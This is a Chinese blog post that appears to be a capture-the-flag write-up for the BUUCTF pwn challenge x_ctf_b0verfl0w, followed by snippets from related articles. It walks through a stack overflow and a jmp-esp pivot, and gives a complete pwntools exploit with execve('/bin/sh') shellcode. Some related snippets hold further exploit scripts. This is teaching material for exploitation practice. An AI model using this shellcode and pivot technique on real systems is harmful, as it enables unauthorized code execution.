BUUCTF pwn x_ctf_b0verfl0w

最新推荐文章于 2025-06-04 15:49:38 发布
原创 最新推荐文章于 2025-06-04 15:49:38 发布
· 987 阅读 · 6 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #linux #python

首先:

checksec一下,发现保护全关,并且可写可读可执行,那么便可以直接传入shellcode并执行 

 

接下来看主程序:

 

发现在s这里存在栈溢出,但是这里没有system("/bin/sh"),与我们最开始的想法不谋而合,传入shellcode并且执行。这里fgets向s写入50字节,其中padding占据0x20(32)个字节,除去fake ebp和ret两个8字节,那么便就只剩下10字节写shellcode,这是不够的,那么如何写入shellcode呢?

重点 :

我们可以在栈初始位置就写入shellcode,然后控制程序执行流在栈初始部分,执行shellcode。如何实现控制程序执行流,看下方的栈布局:

shellcode | padding | fake ebp | jmp_esp_address | sub esp,0x28 | jmp esp

主要思路:

栈布局如上,解析一下,栈开头传入shellcode,shellcode的长度要小于0x24,过长会溢出到ret_address,用shellcraft.sh()生成的shellcode长度为0x2c,是过长的,所以我们要自己手搓shellcode,或者可以去这个网站上找:Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers 

前面不足0x24的填满垃圾数据,然后在ret的部分填入jmp_esp_address,ret等同于pop eip,当eip指向jmp_esp_address,便会执行jmp esp,同时由于pop,esp+4, 此时eip指向sub exp,0x28;jmp esp,便执行这段语句,直接回到栈初始位置,执行shellcode。(0x28=0x20+fake_esp+jmp_esp_address)

思路整理完毕,先ROPgadget寻找jmp:

ROPgadget --binary over --only "jmp|ret"
Gadgets information
============================================================
0x080483ab : jmp 0x8048390
0x080484f2 : jmp 0x8048470
0x08048611 : jmp 0x8048620
0x0804855d : jmp dword ptr [ecx + 0x804a040]
0x08048550 : jmp dword ptr [ecx + 0x804a060]
0x0804876f : jmp dword ptr [ecx]
0x08048504 : jmp esp  #就这个
0x0804836a : ret
0x0804847e : ret 0xeac1

 很巧,这里正好有jmp esp,说明我们的思路没错,那么便直接上脚本:

from pwn import *
context(arch='i386',log_level='debug')
jmp_esp = 0x08048504
r=remote('node5.buuoj.cn',25247)

'''
shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += b"\x0b\xcd\x80"
'''
shellcode = b"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
len1 = len(shellcode)
payload = shellcode + (0x24-len1)*b'a'
payload += p32(jmp_esp)
payload += asm('sub esp,0x28')
payload += asm('jmp esp')

r.sendline(payload)
r.interactive()

脚本中有两个shellcode,都是可以的,第一个shellcode参考了这位佬的文章:

 https://www.cnblogs.com/gaonuoqi/p/12674851.html

第二个shellcode在上面那个网站找到的:

 Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) (exploit-db.com)

总结 :

1.首先思路很重要,分析输入的长度限制,shellcode长度受限该怎么办?

2.对于汇编语言的合理运用,合理控制执行流

BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 415
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
[BUUCTF]-PWN:babyheap_0ctf_2017解析
2301_79326813的博客
01-10 1161
但是这里要解释一点,为什么不能直接释放堆块4,虽然这样堆块4也能进入unsortedbin里,但是要注意free堆块后指向堆块的指针将会被置零,大致意思就是free了之后,index4就不指向那个堆块了,这时候dump(4)就是无效的,虽然那个堆块里面有mainarena+88的地址,但dump(4)不会打印出里面的地址,所以我们要让两个堆块的指针指向同一个堆块,这样在释放掉一个堆块时还能用另一个指针利用该堆块。后面alloc(0x60)与这里的0x7f有关。
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1806
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
x_ctf_b0verfl0w
qq_62887641的博客
09-19 214
32位,保护全关,写shellcode栈溢出并且有个hit给出了jmp esp。
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 736
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
x_ctf_b0verfl0ww
z1r0的博客
01-11 1072
x_ctf_b0verfl0ww 查看保护 有溢出但是空间小不可以ret2libc。没开nx看见不有一个hint 有个jmp esp,这是一个好跳板,可以去看一下0day安全这个书,里面讲到了jmp esp的灵活运用。写shellcode进去,然后通过jmp esp 和 sub esp, xx,jmp esp来执行shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name
BUUCTF(pwn)x_ctf_b0verfl0w
半岛铁盒的博客
04-01 431
flag的地址有了 execve() – 叫做执行程序函数 就像Python中的os.system(cmd)这个函数,我们可以用这个函数来执行我们的shell脚本,单独的shell命令,或者是调用其他的程序,我们的execve()这个函数就和Python中的os.system函数类似,可以调用其他程序的执行,执行shell命令,,调用脚本等等功能。 from pwn import* flag=0x401157 payload='a'*(0x110+8)+p64(flag) p=remote('..
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 879
标准堆菜单。
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3336
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1111
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 490
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
X-CTF Quals 2016 - b0verfl0w [Stack Pivoting]
ACdream
02-13 1121
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting 为什么要使用? (1)栈溢出时,覆盖后剩下的栈空间不够写exp、ROP等溢出利用 (2)开启了PIE,栈地址不固定,没法利用 要求:可以控制EIP或ESP的至少一个,利用gadgets: pop esp...
【Writeup】X-CTF Quals 2016_Pwn_b0verfl0w
BAKUMANSEC - Just Do It
09-02 662
0x01 解题思路 查看文件信息   没有开NX,可以向栈上写入shellcode。防护措施只开了一个Partial RELRO,这意味着每次栈加载的地址会变化。 拖入IDA 32 bits查看 main函数里只有一个vuln函数   显然存在栈溢出,但是只能输入50个字节,而填充的padding字段就需要0x20+4=36个字节,再加上EIP,一共40个字节,只有10个字节的shellc...
栈溢出技巧(上)
m0_59598029的博客
08-10 290
我们都知道由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用,后来各种绕过技术出现,比如return-to-plt、gotransomize)等的出现,PIE保护应运而生了。一般地都会把地址空间随机化和PIE混为一谈,没有详细地去了解过两者的区别(可能只有我没了解过,大佬们飘过即可),因为先来看一下两者的区别。
ctf pwn 萌新学习记录 基本rop(题目来自Wiki)
weixin_73481933的博客
01-04 1827
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)
PWN-shellcode获取与编写
热门推荐
杀生丸?不,其实我要的是桔梗
03-16 1万+
当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。 而shellcode该怎么获得呢? 一、获取集成写好的 1.From pwntools (1)先设置目标机的参数 context(os=’linux’, arch=’amd64’, log_level=’debug’) 1. os设置系统为linux系统,在完成ctf题目的...
【大模型:知识图谱】--3.py2neo连接图数据库neo4j
我是个好人呀,????
06-03 1351
本文介绍了Neo4j图数据库的安装与基本操作。主要内容包括:1) 使用py2neo连接Neo4j数据库;2) 通过Python实现节点创建、删除、属性修改等操作;3) 建立节点间关系的方法;4) 使用NodeMatcher和RelationshipMatcher进行节点和关系查询;5) 通过实例演示如何创建人物节点及其关系网络。文章还对比了Neo4j社区版和企业版的差异。全文提供了完整的代码示例,涵盖从连接到CRUD操作的完整流程。
那些常用的运维工具
A_Tevens的博客
05-31 947
文章摘要:主要监控工具对比分析显示,Zabbix适合中小规模运维,提供灵活告警但配置复杂;Nagios擅长自动化运维但历史追溯弱;Open-Falcon适用于高并发场景;Prometheus+Grafana是云原生监控首选;商用方案如监控宝提供多地域监控但成本较高。专项工具包括ELK日志分析、Lepus数据库监控等。不同场景需匹配不同工具特性,如Zabbix的API集成、Prometheus的云原生支持等。
如何快速找出某表的重复记录 - 数据库专家面试指南
最新发布
hixiaoyang的博客
06-04 829
本文详细介绍了数据库重复记录的检测方法,从基础GROUP BY到高级窗口函数方案,并针对不同数据库系统提供了优化实现。文章强调性能优化策略如索引创建和分块处理,同时探讨了模糊匹配等高级场景。最后提供了面试可能追问的扩展问题和各方法对比,指出业务理解比技术更重要。全文为数据库专家面试提供了全面的技术指导。
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值